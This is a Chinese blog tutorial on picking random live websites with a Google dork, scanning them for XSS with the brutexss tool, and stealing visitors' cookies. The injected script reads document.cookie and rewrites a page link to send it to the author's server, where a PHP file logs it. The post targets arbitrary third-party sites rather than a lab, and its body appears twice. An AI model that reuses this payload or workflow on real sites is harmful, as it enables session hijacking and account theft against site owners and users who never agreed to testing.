寻找xss漏洞网站并利用
2017-08-18 10:00
344 查看
工具:brutexss (可以找我要,或百度)
谷歌搜 inurl:'Product.asp?BigClassName 或其他
随便点进一个网站
CMD进入brutexss工具包(需要Python2.7环境)
brutexss包里面下面4个txt 是字典,运行cmd 运行 brutexss.py
选择方式可以选择get 或者 post,这次选择G,如果是Post也可以选择P
然后输入刚刚需要监测的网站
确定后,选择字典,直接按Enter使用默认 的 wordlist.txt
wordlist.txt
# 约20条常用语句,可以执行一个基本简单的XSS检查
wordlist-small.txt
#约100条语句,可以执行一个相对全面的XSS检查
wordlist-medium.txt
#约200条语句,可以执行一个绕过WAF的XSS检查
wordlist-huge.tx
#约5000条语句,可以执行一个非常全面的并且绕过WAF的XSS检查
扫描出存在xss漏洞
在网站加入JS代码试试
发现可以运行
寻找XSS漏洞基本流程完毕,接下来利用xss漏洞获得cookie,传到我们自己服务器
把script标签里面内容改成:
<script>var aa=document.cookie;var bb=document.getElementsByTagName("a")[0];bb.setAttribute("href","xxxxxxxxxx/test2.php?aa="%2Baa)</script>
(获取aa变量 为 cookie;bb变量为第一个a标签,然后设置第一个a标签的href值为自己服务器的test2.php文件,%2B 是 + 号 的转义)
也可以改成别的,这里面的东西可以好好研究,可以研究出好多好玩的。
然后查看代码 ,已经把a元素 的href标签改成功
然后服务器 test2.php 接收,把接收数据放到test.txt 下
点击改成功的连接后,去服务器test.txt查看数据
成功接收了 cookie 信息,如果登录了,会获得登录了的cookie 信息。
本文章这里结束了,知道自己还是个菜鸟,求共同进步。
谷歌搜 inurl:'Product.asp?BigClassName 或其他
随便点进一个网站
CMD进入brutexss工具包(需要Python2.7环境)
brutexss包里面下面4个txt 是字典,运行cmd 运行 brutexss.py
选择方式可以选择get 或者 post,这次选择G,如果是Post也可以选择P
然后输入刚刚需要监测的网站
确定后,选择字典,直接按Enter使用默认 的 wordlist.txt
wordlist.txt
# 约20条常用语句,可以执行一个基本简单的XSS检查
wordlist-small.txt
#约100条语句,可以执行一个相对全面的XSS检查
wordlist-medium.txt
#约200条语句,可以执行一个绕过WAF的XSS检查
wordlist-huge.tx
#约5000条语句,可以执行一个非常全面的并且绕过WAF的XSS检查
扫描出存在xss漏洞
在网站加入JS代码试试
发现可以运行
寻找XSS漏洞基本流程完毕,接下来利用xss漏洞获得cookie,传到我们自己服务器
把script标签里面内容改成:
<script>var aa=document.cookie;var bb=document.getElementsByTagName("a")[0];bb.setAttribute("href","xxxxxxxxxx/test2.php?aa="%2Baa)</script>
(获取aa变量 为 cookie;bb变量为第一个a标签,然后设置第一个a标签的href值为自己服务器的test2.php文件,%2B 是 + 号 的转义)
也可以改成别的,这里面的东西可以好好研究,可以研究出好多好玩的。
然后查看代码 ,已经把a元素 的href标签改成功
然后服务器 test2.php 接收,把接收数据放到test.txt 下
点击改成功的连接后,去服务器test.txt查看数据
成功接收了 cookie 信息,如果登录了,会获得登录了的cookie 信息。
本文章这里结束了,知道自己还是个菜鸟,求共同进步。
相关文章推荐
- 黑客组织利用“谷歌扫描器”寻找网站漏洞
- 利用XSS注入漏洞能对网站做什么
- 利用XSS注入漏洞能对网站做什么
- 利用XSS注入漏洞能对网站做什么
- 通过Web安全工具Burp suite找出网站中的XSS漏洞实战(二)
- 网站XSS漏洞攻击如何修补
- XSS漏洞的渗透利用另类玩法
- 看我如何利用漏洞窃取麦当劳网站注册用户密码
- 入侵网站的各种漏洞的利用
- 一个利用real,联众游戏程序漏洞,MS06-014传播机器狗/fa.exe的网站
- 内网渗透一:利用Xss漏洞进入内网
- 利用窗口引用漏洞和XSS漏洞实现浏览器劫持
- 有学生提到,在大学选课的时候,可以写一个“刷课机”的程序,利用学校选课系统的弱点或漏洞,帮助某些人选到某些课程。或者帮助用户刷购票网站,先买到火车票。这些软件合法么?符合道德规范么?是在“软件工程”的研究范围么?
- XSS漏洞的渗透利用另类玩法
- 利用万能密码登陆网站后台原理及漏洞修复方法
- asp 网站 XSS跨站脚本漏洞如何修复
- 如何寻找WEB程序漏洞及如何利用和防范
- 利用窗口引用漏洞和XSS漏洞实现浏览器劫持
- struts2漏洞攻击一例 怎样利用Struts2的漏洞(2.0.0<=version<=2.3.15)搞垮一个基于Struts2写的网站? Struts是java web framewor
- 我来教你如何寻找XSS漏洞